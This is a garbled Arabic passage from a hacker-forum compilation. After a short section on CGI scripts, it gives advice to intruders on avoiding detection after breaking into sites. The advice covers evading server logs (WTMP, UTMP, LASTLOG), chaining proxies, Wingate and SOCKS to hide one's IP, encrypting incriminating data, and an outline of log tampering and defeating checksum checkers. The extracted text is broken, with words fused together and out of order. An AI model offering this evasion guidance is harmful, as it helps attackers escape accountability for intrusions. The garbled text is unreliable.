مبرمجالسي جيأي بتحدیدها<br />
یقوم عمل سكریبتاتالسي جيأي علي خطوتینأساسیتین<br />
<strong>١</strong>-فيالخطوةالأولى یقوم السكریبت بعملمعالجةأولیهللبیانات التيأدخلتله .<br />
٢-فيالخطوةالثانیةیعملالسكریبتكقناهللبیانات التي یقومالمتصفحبارسالها اليالسیرفرأوالعكس .<br />
یقوم سكریبت السي جيأي بتشفیرالبیانات حتي تتمكن من العملفيأي منا خللعمل.<br />
یمكن كتابة سكریبتالسي جيأي بأيلغةبرمجة سواءكانتلغة مجمعة مثلالفیجوالبیسكأولغة<br />
مترجمة مثلالبیرل و الفرقالوحیدبین نوعیناللغات أنالبرنامج المبرمجباللغةالمجمعة سو ف یكون<br />
أسر عفيالتنفیذ ولكناللغاتالمترجمةأسر عفي عملیة التطویر .<br />
للسكریب تاذاأرد تأنتعمل عليتعدیل السكریبتأوتطویره<br />
أهمالأوامر التيتعتبروثیقةالصلهلموضوعناهيكالتالي<br />
هذاالأمر یقومبطلببیانات منالسیرفرللمتصفح .<br />
٢- POST هذاالأمر یطلب منالسیرفرقبول المعلوماتالمدخلةالیه منالمتصفح .<br />
هذا الأمر یطلب منالسیرفرقبول المعلوماتالمرسلهالیهكبدیل عنالمدخلات الموجودة حالیا<br />
:<br />
:<br />
GET -<strong>١</strong><br />
PUT -٣<br />
.<br />
(٢)<br />
نقاط الضع ف :<br />
نقاطالضع ف التي یسببها سكریبت السي جيأيلیسضعفافيالسي جيأي نفسه ولكنه ضع ففي<br />
بروتوكول الHTTPأوفيأنظمةالتشغیلالمختلفة .<br />
السي جيأي یسمحباستغلال نقاط الضع فالموجودة ولكن هناك طرقأخريللوصولاليت حطیم النظام<br />
الأمني .كمثال یمكن الوصولاليالملفاتالغیر محمیةباستخدام ال FTPأو ....TELNET<br />
٣٨
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
الفصل الثاني<br />
<br />
((الحمایةوالتخفي))<br />
٣٩
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"الأمن<br />
و(((التخفي))) في الإنترنت"<br />
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$<br />
الكاتب : JawaDal & ال hi_haCker<br />
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$<br />
د ر &<br />
علىكل مخترققبلأن یفكرفياخترقأي موقعانیتعر ف علىكیفبة حمایة وتغطیة اثارهفما هيالفائدة<br />
انتخترق موقعثم یحكم علیككمجرمبالسجنل.......وسو فتنسى بعدهاكل مایتعلقبالاختراق لانك<br />
ستكون مراقب مراقبة شدیدة ......الخ<br />
وأكثر نقطةتكون مصیدةلكثیر منالمخترقین هي ملفاتالوجس LOGsفمثلا عند دخولك لا فتيبي<br />
موقع من خلا لأيثغرةكانتفهذایعنيانهتماختراقكبالفعلاذالمتكنقد وضعاحتیاطتكلذلك وحاولت<br />
انتكون !! anonymous<br />
لانكبمجرد الدخولللا فتيبي في حاجهاسمها1 LOGS...(LOG.FILES) وهنا مرب طالفرس<br />
الكل سیسالالان عن وضیفة هذه ? Logs<br />
الfiles log هيالتيتقوم بتسجیل كل شخ ص اتصلبالجهاز in) loged)و ی حصلوا علىمعلومات<br />
مثل :<br />
....<br />
... و مناي موقع اتیت ....فصلتأو<br />
وقتالدخول ((وقت عملیةالاخترا ق))بالضبط Addressلك<br />
الدوله<br />
المدینه<br />
نظامالتشغیل<br />
صبك(provide(ISP Internet server<br />
و مزود الخدمهالخا المتصفح !!!!هل رأیت مدى خطورة هذاالامر وكیفیة سهولةاصطیادك منقبل الجهات المسؤولة عن هذاالموقع<br />
أو غیره<br />
وهنالك ٣انوا ع<br />
- یسجلكل دخول\خروج، مع میعادالدخول\ الخروجبالاضافهالىالhost<br />
-من Onlneفي هذهالل حظه<br />
اخر دخول<br />
IP ..ال online<br />
...الname host (اسمالجهاز) ....<br />
log files مهمه:<br />
–<br />
...<br />
!!!...<br />
WTMP<br />
UTMP<br />
LASLOG<br />
والكثیرالكثیر!!لذالوأرادالادمنان یلقي نظره علیهم<br />
(log.files)<br />
(down<br />
سو ف یوقعبك( track you<br />
ربمایتبادرالى ذهنكوتقول :لیست هنالكأي مشاكلانا ساستخدمبروكسیین هنالكامر یجبانتعرفه<br />
عنالبروكسیات<br />
جهازك--> خاد مالبروكسي--> الموقع--FTP--تلنتاواي شئاخر!<br />
لواخترقت موقع والادمنارادانیعر ف مصدرك ومنانت فبقلیل منالمال یستطیعالایقا عبك او حتي<br />
یخترقالبروكسي سیرفر و سیعر ف عنككل شئ نفسالكلاملوكن تتستخدماكثر منبروكسي<br />
جهازك--> خادمالبروكسيالاول--> خادم البروكسيالثاني--><br />
فانباستطاعتهان یصلالیكلكن ذلكیتطلب منه جهدا ومالا<br />
الثالث--on ...--so<br />
...لكنفيالاخیرباستطاعتهالوصولالیك .<br />
.<br />
..<br />
٤٠
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
Wingate :-<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
لكنتقدرایضاتستخدم شیئاسمه..<br />
Wingate هوبروكسي ولكن مع جدران حمایة وسأتكلم عنهبشئ منالتفصیل لاحقا وهویسمح<br />
بمشاركهكونكشنانترنت واحداواكثر..فائدهالWingateانه سیخفيالIP عنالكمبیوترالذي ست صل<br />
به!!<br />
وهذه بع ض الملاحظات یجبانتضعهافي حسبانكفیجبانتعر فكی فتبقى<br />
مثلال . alarm zoneامسح ملفا ت<br />
..web وكی فتؤمن جهازك؟!!......<br />
كالكوكیز والانترن تهیستوري و ملفاتالانترنت المؤقته..والملفاتالشخصیه و<br />
اللوق )وهنالكبرنامج رائع یكفیك مؤونة هذه الاعمالاسمه windowsیجبان washer یكونلدیك.<br />
anonymous علىال<br />
how to<br />
استخدم firewall<br />
الهیستوري )<br />
والكثیر.اذهبلجوجل و اكتب howاو to Be anonymous on the web<br />
و لاتنسىا لPGP)d) Preetyانه Good Privacy مجاني ..یجبان یكون عندكلوكنتترید<br />
اختراق موقع و تتركایمیلكفیه!فهو جمیل جدافي عملیةالتشفیر<br />
تستطیعانت حصل علیه من: /http://www.pgpi.org<br />
...<br />
سأشرحالانبشئ منالتفصیللبع ض منالامور الهامة وسنذكر هنا بع ضالطر قللتخفي واخفاءهویتك<br />
: في الشبكة<br />
Proxy - Sock Host - Wingate<br />
-------------------------------------------<br />
Proxy Server<br />
proxy server )<br />
؟؟؟<br />
ما هو ال<br />
خادم الوكیل)هو خادم server نقوم من خلاله بعملیاتالاتصالالمختلفة سواء مع<br />
المواقعاو معالاجهزةالاخرى من خلال الشات وووو ..الخ فعند اتصالكبا لإنترنت من خلال proxy<br />
فإن جمیع اتصالاتك سو فتذهبإلى هذاالبروكسيالمستخدمأولا وقبلكل شيءثمیتمالاتصال<br />
بسیرفر الموقع المطلوب لتكونالاجابةهيتحمیلالموقعالمطلوب ....فمثلاإ ذاأرد تأن تتصلبا لإنترنت<br />
وتریدأن تتصفحوتفتح موقعاكهذا<br />
.. علیكأولابالطلب من هذا proxyثم server یقوم proxy<br />
من خادم server الموقع ومنثم<br />
serverبطلبالصفحة<br />
تحمیلهاوتخزینهالدیكبمعنىانك سو فتستطیعا ستعر ا ض هذهالصفحة<br />
ستلاحظ من خلال ما ذكرتبالتأكیدأن هذهالعملیةتأخذكمیةقلیلة نالبیاناتمقارنة مع الوقتالمستهلكفي<br />
طلب هذهالصفحةفالوقتأطول وكمیة الباتات الواصلةالینااقل مقارنةبالإتصال العادي (بدونبروكسي)<br />
حیث من وقت طلبالصفحة سیتجهالطلب مباشرة منكالى سیرفرالموقعالمطلوب ثمیتمتحمیلها مباشرة<br />
ب حیثتستعرضهافي متصفحكفي وقتاقل ...اذن مع اتصالكبللبروكسي سیرفر سو ف یصبح اتصالك<br />
با لإنترن تبطيء مقارنة معالاتصال المباشر وذلكلأنكل صفحةتقوم بتحمیلهاأيتستعرضهاتذهبإلى<br />
ممایؤديالىابطاء عملیةالتصفحالافي حالة نادرة وهوان یكون<br />
هذا البروكسي<br />
البروكسي سیرفرالمستخدمقریب منالمنطقة التيتوجدبهاانت .اوانیتفق وانتٌطلب نفسالصفحة<br />
التيانت طلبتها من شخ صاخرله نفسالبروكسي الذيتستخدمةانتفي وقت سابققبل طلبكلهذه<br />
الصفحة<br />
...<br />
server<br />
من خلالاستخدام proxy server<br />
http://<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong>/<br />
http://<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong>/<br />
proxey server<br />
.<br />
[User] >>>>>>>>>> [Proxy] >>>>>>>>>> [Web Page]<br />
ip<br />
لماذا نستخدم البروكسي سیرفر؟<br />
لعدةاسباب :السبب الرئیسيهوللحفاظ على هویتك والبقاء مجهولافك عملیاتك التيتقومبها على هذه<br />
الشبكةالمكشوفة والمراقبة منالأعینفيكل مكانب حیثانه حتىلوتماصطیادكفاننهم سی حصلون على<br />
البروكسيالمستخدمفي عملیةالاتصال لانههوالذي یقوم بعملیةالاتصالبسیرفرالموقعالمطلوبكما<br />
ذكرنافهوالوسیطبین المستخدم وسیرفرالموقعالمطلوب . وانا لا أقول بأنه لا یمكنالوصولالیك<br />
...<br />
٤<strong>١</strong>
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
یمكن ولكنبصعوبةبالغة وعملیاتتقفي طویلة وممایزید منصعوبتها هواستخدامك لعدد اكبر من<br />
البروكسیات<br />
سبباخراناغلبمزودي الخدمة ISP یقومونب حجبالكثیر من المواقعالمهمةففيكثیر منالدول<br />
كالسعودیة والامارات وغیرها نجدان مواقعالهكر بنسبة مغلقةاواكثر وانا اتكلم علىالمواقع<br />
الاجنبیة ولیستالعربیةالى غیر ذلك ... فهناتضطرالىاللجوءالىالبروكسیا تللوصولالى هذهالمواقع<br />
نقطةهامة ضعهافي حسبانك وهيكلماكانالبروكسيقریبا منالمنطقةالتيانتبهاكاناداء<br />
البروكسياسر ع .<br />
%٤٠<br />
Proxy Chaining (وتعني سلسلةبروكسیات)<br />
----------------------<br />
٠...<br />
:<br />
وهيتعتبرفعالة جدافياخفاء الهویةلكنها غیر فعالةتمامافي سرعةالاتصال حیثكلما زاد عدد<br />
البروكسیا تكلمااصبحالاتصالابطأ<br />
مثال/<br />
[ User]>>>>>[Proxy 1]>>>>>[Proxy 2]>>>>>[Proxy n]>>>>>[wep page]<br />
ftp<br />
وكما نر ىفانك ست صلبالبروكسيالاولثمبالثانيثمبالثالثثم ...الىان تتصلبالموقعالمطلوب ولیسا<br />
شرطابان یكون موقعافقد یكون<br />
اذنفاستخدام سلسلة منالبروكسیا تامر ضروريلكل مخترق و خصوصااذاشعربالخطر وانه مراقب<br />
ویجب علیهانیتوخىالحذر دائما وذلك حسب مبدأ paranoid" " المعرو فلكل هكر<br />
....<br />
..الخ .<br />
في نهایةالمطا ف سنتحد ث عنكیفیةال حصول علىالبروكسیات وطریقةاختبارهاوتحدیثها<br />
وهذا المفضللدي<br />
...<br />
.<br />
http://www.multiproxy.org/anon_list.htm<br />
http://tools.rosinstrument.<strong>com</strong>/proxy/<br />
..<br />
او عن طریق مجموعةالبروكسيالشهیر ة عبرالیاهو P_R_O_X_Y@yahoogroups.<strong>com</strong><br />
وهيتقومبمراسلتك بأحد ثالبروكسیات وطریقةالانضمامالیهم هوبارسال رسالةفار غةالیهم وفي<br />
عنوان المرسلالیهاكتب P_R_O_X_Y-subscriber@yahoogroups.<strong>com</strong> و سو فتتلقى<br />
رد مباشرة وتصبح احداعضاء الجروب<br />
وتستطیع التأكد من عملالبروكسي من خلال عدة مواقعتوفرلك هذه الخدمة وأشهرها هو<br />
http://www.proxytester.<strong>com</strong>/<br />
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++<br />
ماهو WinGate؟<br />
هو proxyأي server firewall یفوقالبروكسي وهو خادمبروكسي ذو حاجز ناري یحتوي على<br />
حزمةكبیرة وضخمة منالبرامج المختصةبالحمایة والتيتبقیك) Anonymously مجهول الهویة)<br />
wingate<br />
متشابه معالبروكسي سیرفر حی ثیعمل اتصالات معكومبیوترلسیرفر آخر خلال المنفذ , 23فيالحقیقة<br />
هو اتصال. Telnet<br />
كیفیةال حصول علىWinGate؟<br />
بإ مكانكتاخذ عنوان wingate منأصدقائكإ ذاكانلدىاحد منهم<br />
ایضاتستطیع فعل ذلك من خلالبرامجبحث مختصة بذلك مثل WinGate Scanner حیث یجب علیك<br />
فقطتحدیدال IP والهوست نیم واترك الباقيللبرنامجلیقومبمهامه وللمزید حول هذاالموضو عأنصحكم<br />
بالب حث من خلال خادم الهكرز (جوجل )لأن خبرتيفي هذا المجالقلیلة ولانيلماستخدم هذه الطریقة من<br />
قبل<br />
.<br />
٤٢
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
Socks Host<br />
؟<br />
ما هو ال<br />
Socksتقریبا Host مثل WinGateلكنالاختلا ف وهوان السوكسیتصل من خلالالمنفذ<br />
وتستطیع التحكمفیه من خلالالاعدادالموجودةفيالمتصفح وذلكامافي<br />
وهذه الطریقةتستخدمكثیرافي Mirc وتقومبحمایتك<br />
وبإ خفاء ip الخا صبكوتعملك FireWall<br />
وستجدونه<br />
وهنالكالعدید منالبرامجالتيقدتساعدفي عملیةالتخفي مثلبرنامج<br />
حتما مناولالنتائج من خلال عملیةب حثبسیطةفي جوجل<br />
<strong>١</strong>٠٨٠<br />
explorer أو<br />
Ghost Surf<br />
...<br />
Socks Host وبإ مكانكإ ضافة netscape<br />
٤٣
hi_HaCkEr & MaXhAk2000<br />
"<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
" حمایة هویتك في النت<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
$$$$$$$$$$$$$$$$<br />
الكاتب MaXhAk2000:<br />
$$$$$$$$$$$$$$$$<br />
:::<br />
حمایة هویتكفيالنت حتىتصبح مجهولا.<br />
**************************************************<br />
هذا هو صلب الموضو ع والذي یأخذ الجانب الأهم> صار مسلسل==<br />
یشغل هذا الجانب الأهمیة الكبر ىلد ى الهاكر المحترفین وغیرهم من عدم ملاحقتهم عنداختراقهم وغیره<br />
ولعدمتعرضهمللمقاضاةفي المحاكم والسجون<br />
لهذاهناكقاعدةتقول """>>احم نفسكقبلانتهاجم""">تنبهلناضعلكم<br />
.<br />
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$<br />
٣-هناك طریقةاخر ىلجلبالبروكسیات<br />
استخدامبرامجالب حث عنالبروكسیات ومنها proxy hunter وبرنامج وغیرها<br />
الوصلةلكنانتم علیكم البحثفي
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
،لبنان ،<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
مبهمه غیر حقیقه مثلا (فرنسا ،كوبا،العراق مصر، افریقاالجنوبیه ( وهكذالكيیتمأخفائك بكل<br />
سهوله وبساطه. وكذلك من میزات ستیجانوس حذ ف خطوات التجسسالمخزنهفي حاسبتك الخاصه<br />
بتصفح الأ نترنتأو نظامالتشغیل( الویندوز ). وأمورأخر ى یجدربناالاشارهالى بعضها :<br />
-تنكیروتغییر رقم الأیبيالحقیقي الخا صبكلكي لایمكنكشفك ومعرفههویتك.<br />
-مسح خطوات التجسس الناتجه منتصفح الأنترنت وخطوات نظامالتشغیل.<br />
وغیرها منالمزایاتجدونهافي الشرحفي م نتدیاتبوابةالعرب<br />
http://www.arabsgate.<strong>com</strong>/<strong>vb</strong>/showthread.php?threadid=215946<br />
.<br />
...<br />
٣-استخدامبرنامجJAP<br />
هذا البرنامج یقومبجعلك تتصفحالأنترنتبدونبركسيتكونكل المواقع مفتوحة وهذا البرامجانا مجربة<br />
وشغال میه میه>>> خطوات عمل البرنامج>ارجوا عدماستخدامهفیما لا یرضيااللهعز وجل
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
"احمي نفسك وغطي افعالك<br />
"<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
$$$$$$$$$$$$$<br />
الكاتب: DJ KING<br />
$$$$$$$$$$$$$<br />
هذاالموضو ع سیجعلكتخا ف من خیالكوتعملال ف حسابلظلك ..لكنانشاله سیكون دفعهللامام ولیس<br />
لانتخاف و تتراجع<br />
اسلوب الموضو ع غ ریب .. و عادة مانتجنبه دائما ..بمعنىاخر ..كل مناخواننا واساتذتنا من كتبوا<br />
دروسا و شروحافياختراق السیرفرات والمواقعكان همهمالوحیدفيالحمایه هو مسحاللوق log<br />
لكن هل هذا یجعلكفيامانتام ؟!هل هذا سیمنع تتبع اثرك ؟!! هذا ما ستكتشفه بعدالانتهاء من<br />
قراءةالموضو ع<br />
..<br />
!!<br />
"<br />
)<br />
files ..<br />
..<br />
************************<br />
!!<br />
اذاكن تتظنانال حصول علىترجمة الثغرات ) exploites )باسر ع ما یمكن هو ما یجعلك محترفا و<br />
متطورافاسمحليباناقوللك "انكانسان خاطئ واناسلوبتفكیرك غلط<br />
ماذا ستفیدك الثغره الحدیثه جدا ) ٠ dayعندمایتمالقب ض علیكاذا هاجمتاحد ىالسیرفراتالكبیره<br />
؟ و عندها سیتمالسیطره علىاجهزتك وادواتكو مراقبتك !؟!<br />
یمكن یر ىالبع ضان هذالمبحد ثقط لاي شخ صنعرفه ؟اوانبلادنالی سفیها هذهالتقنیاتالعالیه<br />
لكن هذاقد یحد ث یوم ما<br />
وایضاانتلاتهاجمفقط سیرفرا تبلدكانما سیرفراتاخرى عالمیه محمیه منقبلالشرطهالدولیه ..كما<br />
انه لابد منالحر ص وفهمالاموراذاكنتتریدانتسمي نفسك هكر hackerبمعنىالكلمه<br />
ربماتعتقدفي نفسكانك اكبر منقراءة هذاالموضو ع بكثییر لانك منالمعروفین عنهمبالاحترا فاوانك<br />
تر ى ذلكفي نفسك ..لكنانااؤكدلكبانك مخطئ وانتتحتاجلقراءةالموضو ع اليالنهایه<br />
************************<br />
:<br />
=================<br />
الموضو ع مقسمالى ٨اجزاء<br />
(<br />
:<br />
الجزءالاول :المقدمه ) وهو ماقدقم تانتبالانتهاء منقرائته حالیا<br />
الجزء الثاني :الامورالعقلیه وكی فتصبح " Paranoid "** هذا الجزء سیتم عرضه من خلال هذه<br />
المواضیع<br />
-الدافعاوالحافز<br />
-لماذاان لابدانتصبح " Paraniod "<br />
**<br />
-كیف یمكنانتصبح " Paranoid "؟<br />
-وكی فتحافظ علىاسلوبك الجدیداو شخصیتكالجدیده ؟!<br />
..<br />
(<br />
-<br />
-<br />
متاكدانمعظمكمیتسائل عن معنى هذهالكلمه سیتمتوضیحمعناها و مفهومها مع شرح هذا الجزء<br />
انشاءاالله.<br />
الجزء الثالث :الاساسیاتالتي یجب علیكمعرفتهاقبلانتقومباي عملیةاختراق (و سیتم عرضها من<br />
خلالالنقاطالتالیه<br />
تمهید<br />
-امن نفسك<br />
حسابك الخا ص<br />
-ملفاتاللو قLoGs<br />
٤٦
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
-لا تتركاي اثر<br />
-امور واشیاء یجبتجنبها و ال حظر منها<br />
الجزء الرابع :التقنیات الحدیثه اليیتي یجب ملاحظتها ) و سیتمعرضه من خلال النقاطالتالیه<br />
تمهید<br />
-امنعتقفى اثرك مناي نوع<br />
-ایجاداي نو ع منانوا ع ملفاتاللوق lOGs مهماكانفیها منتلاعب<br />
(<br />
..<br />
-تحقق منlogfile syslog configuration and<br />
-<br />
-<br />
:<br />
:<br />
-<br />
تحقق من نوعیاتبرامجالامن المثبته<br />
تحقق من وجودالمدراءAdmins<br />
-كیف یمكنتص حیح checksum checking software<br />
- حیل المستخدمالامنیه<br />
الجزء الخامس ماذاتفعلان وضعتتحت المراقبه<br />
الجزء السادس ما الذي علیكالقیامبه وایضاالذي لابد من عدمالقیامبهفي حالةانهتمالقب<br />
الجزء السابع :قائمهبافضل البرامجللتخفي والاختباء<br />
الجزء الثامن :كلمه ختامیه ........ارجوان تتابعو الموضوعبحر ض وتركیز شدیدن منالان<br />
ض علیك<br />
!!! ...<br />
***************************************************************************************<br />
:<br />
=======<br />
:<br />
*************<br />
..<br />
الجز الثاني<br />
-الدافع و الحافز<br />
لابد منت حكیم العقلللنجاحفياي عمل ..العقل هوالقوه التي ستدفعك وتحفزك لتصبحانسان واقعي<br />
مسئول و حری ص<br />
المخترق ) Hacker ( الناجح لابد وان تتوفرفیه هذه المبادى ء و الامكانیاتالعقلیه مثلها مثلبناء<br />
عضلاتالجسملن یكبر الجسم ویتقسمالا بعد ممارسةالریاضه الخاصه بذلك ) على سبیلالمثال<br />
مهماكنت متمرساولدیكالكثییر منالمعلومات لابداخذاشدالاحتیاطات و الحذرقبلالقیامباي شئ<br />
(<br />
..<br />
-لماذا یجبانتصبح " Paranoid "؟<br />
***************************<br />
" " Paranoiaفياللغهالانجلیزیهتعني جنونالارتیاب<br />
(<br />
) نزعه عندالافرادتجعلكتشكفي جمیع<br />
كلمة<br />
الامور و جمیعالاشخا ص<br />
اعتقدانالاموربدات تتضحلنا بعدمعرفةاصل هذه الكلمه<br />
یمكنان نلخ ض ما ذكر من خلالالكلماتالتالیه paraniod :تعنيانتصبح شدید الحذر والشكفي<br />
جمیعالظرو ف<br />
لماذا یجبتوخي الحذربهذهالطریقه المخیفه ؟!!<br />
..<br />
..<br />
..<br />
لانتوقعك دائما الىاسوءالظرو ف یجعلكتسیرفيامان .. و لان ماتفعله هو شئكبییر جدا ماتراه<br />
انت بعینك المجردهانكتغیرالصفحهالرئیسیه اوتقوم بتحمیل بع ضالمعلومات منالسیرفرهو شئ<br />
بسیطبل و سهل جدا<br />
ماذالوانكاخترقت سیرفرمعین وتم رصدك و تتبعك و القب ض علیك منقبل الشرطه !؟! وانك سترمى<br />
في السجنكالسارقین والمجرمین<br />
انكنت لاتهتمبماقد ی حصللك .. علیكالاهتمامبما ماقد یصیباهلك ..ابوك ...امك ..اخوتك ..<br />
٤٧
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
زوجتك واطفالك (انكنت متزوج (<br />
ربمالاتشعربان ماتقومبه هو جریمه ..لكنفيالحقیقه هي جریمه<br />
هلتعر ف ماذا سینتظركانتم القب ض علیك ؟!<br />
سیتم حرمانك منكلامورالكومبیوتر نظرة الناسالغییر طبیعیهلك (لیست نظرةاعجابانما نظرة<br />
خو ف ( ..لنت حظى بفر صالعمل التيتستحقها .. ستسدعى عند حصولاي مشاكلاخرى من هذاالنو ع<br />
..لذافانمعظم منیسقطون لا یقومونثانيابدا<br />
!!<br />
!!<br />
..<br />
لذافاصبح حذرا جدا و شكاكا ..امن نفسك<br />
اخذ جمیعالاحتیاطات<br />
لاتهتمبماقدیقولهالكثیرون عنكبانك خوا فاو ما شابه<br />
اهتمباي مل ف log مهماكان تقیمتهتافهه<br />
لتصبح hacker علیكانتقوم بعملك سلیما<br />
% <strong>١</strong>٠٠<br />
..<br />
كی فتصبح " Paranoid "؟<br />
*********************<br />
(<br />
)<br />
اذاكنتقرأت ما سبق واقتنعتبهانتبالفعلاصبحت هذا الشخ ص " Paranoid "لكنالاقتناع وحده<br />
لا یكفي و التحمس وحده ولید الل حظهایضا لایكفي ...انما لابدان یكونالقلق و التوتر موجودینبشكل<br />
دائمفي حیاتك الالكترونیه<br />
اذاكنت فعلاتریدانتكون هكر حقیقي ... لابدانتعر فلمنتقول هذهالحقیقه وكی ف تتعامل معالاخرین<br />
..اعمل حسابانك مراقب دائما وانه هناككامیرا خفیه وراك دائما ..فاحذرفيكلامك على الهات ف لانه<br />
قد یكون مراقب ..او حتىبریدیكالشخصي والالكتروني ) لابدانتعمل حسابالغیرالمتوقع)<br />
اذا ماقد ذكرته لا یهمك وانكانسان غیر مبالي ..دعنياسألك هذهالاسئله ؟<br />
هلتریدانیراكالاخرین مجرم ؟ هلتریدانتر ى الحزن و الدمو ع على وجهاهلك ؟هلتریدانت حسر<br />
قلوبهم علیك ؟!<br />
هلتریدانتفقداصدقائك ؟ خطیبتك ؟ صحبتك ؟<br />
تذكران الضررلنیعود علیكفقطانما سیعود علىكل منتعرفه<br />
-وكیفتحافظ علىاسلوبك الجدیداو شخصیتكالجدیده ؟ !<br />
******************************************<br />
بما انكقداستوعبت ماذكر حتىالان وقرر تانتكونانسان حری ص جدا .. لابدانتبقى هكذا طوال<br />
الوقت<br />
وتذكر هذه الكلمات :ل حظةكسل واحدهفي اتخاذالاحتیاطاتالامنیهقدتغیر حیاتكباكملها ؟!!!!<br />
دائماتذكر الدافع<br />
-الجزءالثال ث:<br />
=========<br />
-<br />
******<br />
تمهید<br />
یجبمعرفة هذهالامور القادمه واستیعابها جیداقبل ممارسةاي عملیةاختراق .. حتىلوكنت مخترق<br />
متمرس لابدانتستوعبالافكار القادمه<br />
٤٨
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
: -امن نفسك<br />
***********<br />
-ماذالوقرأال SysAdmin<br />
رسائلك البریدیهالالكترونیه ؟<br />
-ماذالوكانت اتصالاتكالهاتفیه مسجله و مراقبه منقبلالشرطه ؟<br />
-ماذالوتم ضب طالكومبیوترالشخصي والسیطره علىكلمعلوماتك ؟<br />
اذاكنتلاتقوم بعملاي اتصالات هاتفیه معاي شخ ص منالهاكرزاو الكراكرز .. ولاتبعثايایمیلات<br />
فیهمعلومات مشبوهه و لاتمتلكايمعلوما تامنیه و حساسه على جهازكفهذا ببساطه لا یشكلاي خو ف<br />
لانه ببساطهایضاان تلست مخترقاو(= hacker<br />
لانه لابد من وجود اتصالبینك وبیناصدقائكالمهتمینبهذا المجال الاخبار والافكار<br />
كماانه لابد وانكتمتلك بع ضالملفات اللازمهللاختراق او بع ضالمعلوماتاليتعبر مدینهلكفي حالة<br />
حدو ث رصدلجهازك (كبسه<br />
..<br />
.. لتبادل<br />
(<br />
< --<br />
--><br />
قم بتشفیركل ماتملكه منمعلومات حساسه sensitive data<br />
یمكنك ذلكباستخدام بع ض البرامجالموجوده مجانا علىالانترنت .. و هذهقائمهبافضل البرامج و التي<br />
تعتبراختیار الهاكرزالاول :<br />
-لمستخدمین MsDos الیكم v.17 SFS او1.4b SecureDrive<br />
-لمستخدمین نظام Amiga* الیكم * ( v1.5 EnigmaII<br />
(<br />
-لمستخدمینانظمةال Unix الیكمv1.33 CFS<br />
خصوصافي عالمنا العربي<br />
احدىانظمةالتشغیل غیر شائعةالاستخدام<br />
لتشفیر الملفا تبشكلفردي<br />
مل فبمل ف )الیكم هذه البرامج (الاكثر شهره والاحسناداء<br />
: (<br />
)<br />
- Triple DES<br />
- IDEA<br />
- Blowfish (32 rounds)<br />
- file2file<br />
لتشفیرالایمیلات:<br />
-PGP v2.6.x<br />
یمكنكایضاتشفیر عملیة اتصالك ب ( System Unix علىاساس انه ممكنانتكون مراقب<br />
و ذلكباستخدام<br />
(<br />
..<br />
..<br />
٤<br />
:<br />
SSH -الامن حتىالان<br />
- DES Login<br />
غیر شائعه ..لاتوجدفيالقوامیس ..لكنفي نفس<br />
غیر منطقیه اجعلكلماتكالسریهصعبةالتخمین الوقت لابدان تتذكرها دائما<br />
اخترها من كتاب تتمتلكه .. اجعلهااكبر عدد ممكن منالاحر ف ) یعني عادة عند عملاياشتراك یطلب<br />
-٨احر ف )فاخترال ٨ حرو ف<br />
منككلمه سریه تتكون من ٤٩
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
لاتحفظارقام هواتفاصحابك الهاكرزبشكلاعتیادي ..انما یمكنكبانتشفرها<br />
فق ط ( و اتصلبهم منهوات ف الشار عاو منالعمل<br />
اذاانتبالفعل متعمق جدافيالهاكینجفلابد منتشفیركل شئیتعلقبهذهالامور<br />
احفظ دائما نسخهاحتیاطیه منمعلوماتك على CD او HD وبالطبعتكون مشفره حتىاذا خسرت<br />
المعلوماتالموجوده على جهازك یكونلدیك نسخاحتیاطیه<br />
ملفات مطبوعه و لاتریدها مرة<br />
لاتحتفظبملفاتلاتحتاجها<br />
اخر ىلاتقطعهااعتیادیاانمااحرقهافي مكان بعیدكل البعد عناماكنتواجدكالاعتیادیهاواناردت<br />
الاحتفاظبهافعلیك كتابتها من جدیدباسلوب مرمزاو مشفر لایعرفهالاانت !!<br />
هلتعر فانه منالممكنان<br />
) حتىبرموزتفهمهاانت<br />
!!<br />
..<br />
.. وانكانلدیك document files او<br />
:<br />
=================<br />
، المخابرات<br />
:<br />
